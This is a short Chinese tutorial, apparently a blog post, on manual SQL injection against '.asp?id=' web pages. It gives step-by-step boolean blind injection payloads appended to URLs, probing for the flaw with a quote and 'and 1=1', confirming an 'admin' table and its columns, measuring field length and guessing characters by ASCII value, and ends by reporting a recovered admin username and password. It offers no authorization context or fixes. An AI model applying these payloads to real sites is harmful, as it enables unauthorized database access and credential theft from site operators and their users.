SQL注入

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。


一般来说,进入网址后,随便进入一个链接,这使得网址链接都是以【.asp?id=32(数字任意)】结尾的


首先在末尾加单引号【’】

显示数据库输入错误,说明单引号被过滤掉,bu可以用


接着在末尾加【and 1=1】     [and 1=2]

找到有注入漏洞的目标网站
返回页面显示该网站存在注入漏洞

在链接末尾添加语句【and exists(select * from admin)】,页面正常显示,说明存在表名【admin】。


在连接末尾添加语句【and exists(select admin from admin)】,页面显示正常,即在表中存在admin列。


在链接末尾添加【and exists(select password from admin)】,页面显示正常,说明存在列password


在连接末尾输入语句【and (select top 1 len (admin) from admin)>1】,页面显示正常,数字依次加1,进行测试,如【and (select top 1 len (admin) from admin)>5】,说明字段长度为5。


同样的方法,在链接末尾添加连接【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,可猜解出第一条记录的第一位字符的ASCII码为97,对应a


同样的方法可以得到admin字段内容为【admin】,password字段内容为【bfpms】。


其实就是慢慢猜解,第一猜注入漏洞,第二财列表名,第三猜字段内容(对照ASCII码查出账户和密码)

你可能感兴趣的:(SQL注入)